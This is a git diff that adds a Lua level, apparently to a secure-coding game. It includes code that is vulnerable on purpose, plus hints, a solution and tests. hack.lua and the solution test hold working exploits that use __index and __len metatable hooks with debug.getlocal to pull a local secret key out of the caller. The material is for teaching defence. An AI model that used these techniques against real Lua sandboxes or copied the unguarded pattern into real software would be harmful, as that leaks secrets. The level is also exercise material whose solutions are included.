Adding New Level: Lua Metatable hooks

.devcontainer/devcontainer.json

@@ -1,9 +1,16 @@
 {
-  "onCreateCommand": "sudo apt-get update && sudo apt-get -y install libldap2-dev libsasl2-dev && pip3 install pyOpenSSL && pip3 install -r requirements.txt",
+  "onCreateCommand": "sudo apt-get update && sudo apt-get -y install libldap2-dev libsasl2-dev lua5.4 && pip3 install pyOpenSSL && pip3 install -r requirements.txt",
   "customizations": {
     "vscode": {
-      "extensions": ["ms-python.python", "ms-python.vscode-pylance", "ms-vscode.cpptools-extension-pack", "redhat.vscode-yaml", "golang.go"]
+      "extensions": [
+        "ms-python.python",
+        "ms-python.vscode-pylance",
+        "ms-vscode.cpptools-extension-pack",
+        "redhat.vscode-yaml",
+        "golang.go",
+        "sumneko.lua"
+      ]
     }
   },
   "postCreateCommand": "npm install --prefix Season-2/Level-3/ Season-2/Level-3/ && npm install --global mocha"
-}
+}

.github/workflows/codeql-analysis.yml

@@ -18,7 +18,7 @@ jobs:
     strategy:
       fail-fast: false
       matrix:
-        language: ['python', 'go', 'javascript']
+        language: ["python", "go", "javascript"]
 
     steps:
       - name: Checkout repository

Season-3/Level-1/code.lua

@@ -0,0 +1,39 @@
+-- Welcome to Secure Code Game Season-3/Level-1!
+
+-- Follow the instructions below to get started:
+
+-- 1. tests.lua is passing but the code is vulnerable
+-- 2. Review the code. Can you spot the bugs(s)?
+-- 3. Fix the code.lua, but ensure that tests.lua passes
+-- 4. Run hack.lua and if passing then CONGRATS!
+-- 5. If stuck then read the hint
+-- 6. Compare your solution with solution/solution.go
+
+local module = {}
+
+
+--- Generates a bitmap image
+-- @param request: The table which we will populate with images
+-- @return table: Of the sources now with the generated bitmaps to display
+module.generate_bmps = function(request)
+    -- Do not delete
+    local secret_key = "I love my mama"
+    -- End of do not delete
+
+    if type(request) ~= "table" then
+        return "Invalid request"
+    end
+    for i = 1, #request, 1 do
+        if type(request[i].source) ~= "string" then
+            -- This will display an error image to the user, letting the know something is wrong
+            request[i] = { source = "Bad request", image = "Error Image" }
+        else
+            request[i].image = "Cat pictures"
+        end
+    end
+    return request
+end
+
+
+
+return module

Season-3/Level-1/hack.lua

@@ -0,0 +1,89 @@
+-- This file exploits the vulnerabilities in code. Running this file will fail initially
+-- (it contains failing tests). As all other levels, your goal is to get this file to pass.
+
+-- Run them by opening a terminal and running the following:
+-- $ (cd Season-3/Level-1/ && lua hack.lua)
+
+local code = require("code")
+
+
+local indexHookExploit = function()
+    local malicous_code_executed = false
+
+    local malicous_metatable = {
+        __metatable = {},
+        __index = function(og_table, index)
+            print("[SCRIPT EXECUTING]")
+            malicous_code_executed = true
+            local variables = {}
+            local idx = 1
+            while true do
+                local ln, lv = debug.getlocal(2, idx)
+                if ln ~= nil then
+                    variables[ln] = lv
+                else
+                    break
+                end
+                idx = 1 + idx
+            end
+
+            og_table.recieving_payload = variables["secret_key"]
+
+            return "Get PWNED"
+        end
+    }
+
+    local odd_request = { { source = "Legit link", image = nil }, nil, { source = "Another legit link", image = nil } }
+    local malicous_metatable = setmetatable(odd_request, malicous_metatable)
+    local result = code.generate_bmps(malicous_metatable)
+
+    if type(result) == "table" and result.recieving_payload ~= nil then
+        print("Malicous payload recieved: ", result.recieving_payload)
+    end
+
+    print(not malicous_code_executed)
+end
+
+local lengthHookExploit = function()
+    local malicous_code_executed = false
+
+    local malicous_metatable = {
+        __metatable = {},
+        __len = function(og_table)
+            print("[SCRIPT EXECUTING]")
+            malicous_code_executed = true
+            local variables = {}
+            local idx = 1
+            while true do
+                local ln, lv = debug.getlocal(2, idx)
+                if ln ~= nil then
+                    variables[ln] = lv
+                else
+                    break
+                end
+                idx = 1 + idx
+            end
+
+            og_table.recieving_payload = variables["secret_key"]
+
+            return 3
+        end
+    }
+
+    local odd_request = {
+        { source = "Legit link",                image = nil },
+        { source = "Another legit link",        image = nil },
+        { source = "Another legit boring link", image = nil }
+    }
+    local malicous_metatable = setmetatable(odd_request, malicous_metatable)
+    local result = code.generate_bmps(malicous_metatable)
+
+    if type(result) == "table" and result.recieving_payload ~= nil then
+        print("Malicous payload recieved: ", result.recieving_payload)
+    end
+
+    print(not malicous_code_executed)
+end
+
+lengthHookExploit()
+indexHookExploit()

Season-3/Level-1/hint-1.txt

@@ -0,0 +1,4 @@
+Seems like when we index the table something else happens.
+What is hack.lua doing to enable it to run the code?
+
+Try to solve it without hint 2

Season-3/Level-1/hint-2.txt

@@ -0,0 +1 @@
+This has got to do with metatables. Maybe read the docs to find out how we could detect if a metatable is set?

Season-3/Level-1/solution/solution.lua

@@ -0,0 +1,55 @@
+-- Welcome to Secure Code Game Season-3/Level-1!
+
+--[[Attempt to sanitize the request by calling setmetatable on it
+    We know that if the __metatable property is set setmetatable will fail
+    thus why we make a protected call, and if it succeeds we can continue.
+    If it fails we know someone is trying to do a metatable exploit
+--]]
+
+
+-- Full solution:
+
+local module = {}
+
+--- Generates a bitmap image
+-- @param request: The table which we will populate with images
+-- @return table: Of the sources now with the generated bitmaps to display
+module.generate_bmps = function(request)
+    -- Do not delete
+    local secret_key = "I love my mama"
+    -- End of do not delete
+
+    if type(request) ~= "table" then
+        return "Invalid request"
+    end
+
+    local isNotMalicous, errVal = pcall(function()
+        setmetatable(request, {})
+    end)
+
+    if not isNotMalicous then
+        return "Invalid request"
+    end
+
+    for i = 1, #request, 1 do
+        local isNotMalicous, errVal = pcall(function()
+            setmetatable(request[i], {})
+        end)
+
+        if not isNotMalicous then
+            return "Invalid request"
+        end
+
+        if type(request[i].source) ~= "string" then
+            -- This will display an error image to the user, letting the know something is wrong
+            request[i] = { source = "Bad request", image = "Error Image" }
+        else
+            request[i].image = "Cat pictures"
+        end
+    end
+    return request
+end
+
+
+
+return module

Season-3/Level-1/solution/solution_test.lua

@@ -0,0 +1,149 @@
+-- Run solution_test.lua by following the instructions below:
+
+-- This file is a copy of code_test.go and hack_test.go
+-- It tests the solution for failing and passing payloads
+
+-- Run them by opening a terminal and running the following:
+-- $ (cd Season-3/Level-1/solution && lua solution_test.lua)
+
+local code = require("solution")
+
+
+local indexHookExploit = function()
+    local malicous_code_executed = false
+
+    local malicous_metatable = {
+        __metatable = {},
+        __index = function(og_table, index)
+            print("[SCRIPT EXECUTING]")
+            malicous_code_executed = true
+            local variables = {}
+            local idx = 1
+            while true do
+                local ln, lv = debug.getlocal(2, idx)
+                if ln ~= nil then
+                    variables[ln] = lv
+                else
+                    break
+                end
+                idx = 1 + idx
+            end
+
+            og_table.recieving_payload = variables["secret_key"]
+
+            return "Get PWNED"
+        end
+    }
+
+    local odd_request = { { source = "Legit link", image = nil }, nil, { source = "Another legit link", image = nil } }
+    local malicous_metatable = setmetatable(odd_request, malicous_metatable)
+    local result = code.generate_bmps(malicous_metatable)
+
+    if type(result) == "table" and result.recieving_payload ~= nil then
+        print("Malicous payload recieved: ", result.recieving_payload)
+    end
+
+    print(not malicous_code_executed)
+end
+
+local lengthHookExploit = function()
+    local malicous_code_executed = false
+
+    local malicous_metatable = {
+        __metatable = {},
+        __len = function(og_table)
+            print("[SCRIPT EXECUTING]")
+            malicous_code_executed = true
+            local variables = {}
+            local idx = 1
+            while true do
+                local ln, lv = debug.getlocal(2, idx)
+                if ln ~= nil then
+                    variables[ln] = lv
+                else
+                    break
+                end
+                idx = 1 + idx
+            end
+
+            og_table.recieving_payload = variables["secret_key"]
+
+            return 3
+        end
+    }
+
+    local odd_request = {
+        { source = "Legit link",                image = nil },
+        { source = "Another legit link",        image = nil },
+        { source = "Another legit boring link", image = nil }
+    }
+    local malicous_metatable = setmetatable(odd_request, malicous_metatable)
+    local result = code.generate_bmps(malicous_metatable)
+
+    if type(result) == "table" and result.recieving_payload ~= nil then
+        print("Malicous payload recieved: ", result.recieving_payload)
+    end
+
+    print(not malicous_code_executed)
+end
+
+
+local does_it_return_cats = function()
+    local our_normal_request = {
+        { source = "Legit link",                image = nil },
+        { source = "Another legit link",        image = nil },
+        { source = "Another legit boring link", image = nil }
+    }
+
+    local expected_result = {
+        { source = "Legit link",                image = "Cat pictures" },
+        { source = "Another legit link",        image = "Cat pictures" },
+        { source = "Another legit boring link", image = "Cat pictures" }
+    }
+
+    local result = code.generate_bmps(our_normal_request)
+
+    local isValid = true
+
+
+    for key, value in pairs(result) do
+        if not (value.source == expected_result[key].source and value.image == expected_result[key].image) then
+            isValid = false
+        end
+    end
+
+    print(isValid)
+end
+
+local does_it_hanlde_malformed_requests = function()
+    local our_normal_request = {
+        { source = "Legit link",        image = nil },
+        { source = 1,                   image = nil },
+        { source = "legit boring link", image = nil }
+    }
+
+    local expected_result = {
+        { source = "Legit link",        image = "Cat pictures" },
+        { source = "Bad request",       image = "Error Image" },
+        { source = "legit boring link", image = "Cat pictures" }
+    }
+
+    local result = code.generate_bmps(our_normal_request)
+
+    local isValid = true
+
+
+    for key, value in pairs(result) do
+        if not (value.source == expected_result[key].source and value.image == expected_result[key].image) then
+            isValid = false
+        end
+    end
+
+    print(isValid)
+end
+
+does_it_return_cats()
+does_it_hanlde_malformed_requests()
+
+lengthHookExploit()
+indexHookExploit()